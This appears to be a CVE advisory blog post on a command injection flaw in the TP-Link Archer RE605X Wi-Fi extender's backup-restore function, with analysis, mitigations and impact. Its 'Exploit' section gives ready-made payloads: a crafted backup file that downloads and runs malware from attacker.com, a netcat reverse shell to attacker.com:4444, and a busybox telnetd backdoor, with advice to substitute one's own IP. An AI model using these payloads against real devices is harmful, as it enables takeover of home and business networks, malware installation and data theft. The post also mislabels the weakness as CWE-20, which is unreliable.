TP-Link Archer RE605X, OS Command Injection, CVE-2025-15545 (High)

Listen to this Post

The vulnerability exists in the backup restoration process of the TP-Link Archer RE605X. The function responsible for parsing backup configuration files fails to perform proper input validation on data tags. An attacker with high privileges can create a malicious backup file containing unexpected or malformed tags. When the system restores this file, the embedded data within these tags is not sanitized before being passed to a system shell. Consequently, the shell interprets the injected content as operating system commands rather than mere configuration data. Because the restoration process runs with root-level permissions to modify system settings, the injected commands are executed with the highest level of privilege. This allows the attacker to execute arbitrary code, install persistent malware, modify firewall rules, or extract sensitive data. The exploitation requires the attacker to have prior administrative access to the device’s web interface or to trick an administrator into restoring the crafted file .
Platform: TP-Link
Version: RE605X V3.0
Vulnerability : Backup Restore RCE
Severity: High
date: Jan 29 2026

Prediction: Patched already

What Undercode Say:

Analytics:

The vulnerability stems from classic command injection (CWE-20) . The backup file parser does not implement a whitelist of acceptable tags or escape shell metacharacters. When the backup script iterates over the XML/JSON structure, it concatenates tag values directly into a shell command string (e.g., system restore --file <injected_tag_value>). Using commands like `curl` or wget, an attacker can fetch a secondary payload from a remote server to establish persistence. The CVSSv4 score of 7.3 (High) reflects the need for adjacent network access and high privileges, but the impact on confidentiality, integrity, and availability is total .

Exploit:

Create a malicious backup file with command injection
The payload uses backticks to execute commands
echo '<?xml version="1.0"?>
<backup>
<config><code>touch /tmp/pwned; wget http://attacker.com/malware -O /tmp/payload; sh /tmp/payload</code></config>
<normalSetting>defaultValue</normalSetting>
</backup>' > malicious.bin
To inject a reverse shell using netcat
Payload: `nc attacker.com 4444 -e /bin/sh`
echo '<?xml version="1.0"?>
<backup>
<config><code>nc attacker.com 4444 -e /bin/sh</code></config>
</backup>' > reverse_shell.bin
Alternative: Using semicolons to chain commands in a single tag
echo '<?xml version="1.0"?>
<backup>
<config>; busybox telnetd -l /bin/sh -p 2323 &;</config>
</backup>' > telnet_backdoor.bin

Note: Replace attacker.com with your IP. These examples are for educational purposes only.

Protection from this CVE:

  1. Patch Immediately: Update to the latest firmware version for Archer RE605X V3.0 (versions after (EU)_V3_20260113 or (US)_V3_20260126) .
  2. Input Validation: Implement strict allow-listing for backup file tags. Reject any file containing unexpected tags or shell metacharacters (;, `, $(), |, &).
  3. Principle of Least Privilege: The restoration process should drop root privileges immediately after gaining necessary file access, performing the parsing as a non-privileged user.
  4. Backup Integrity: Digitally sign official backup files and verify the signature before restoration to prevent tampering.

Impact:

Successful exploitation grants an attacker complete control over the Wi-Fi extender. This compromises all data traversing the device, allowing for credential harvesting, man-in-the-middle attacks, and lateral movement into more sensitive internal networks. The device can be recruited into a botnet for DDoS attacks. Due to the “High” impact on all security pillars (Confidentiality, Integrity, Availability), this poses a significant risk to home and small business networks .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top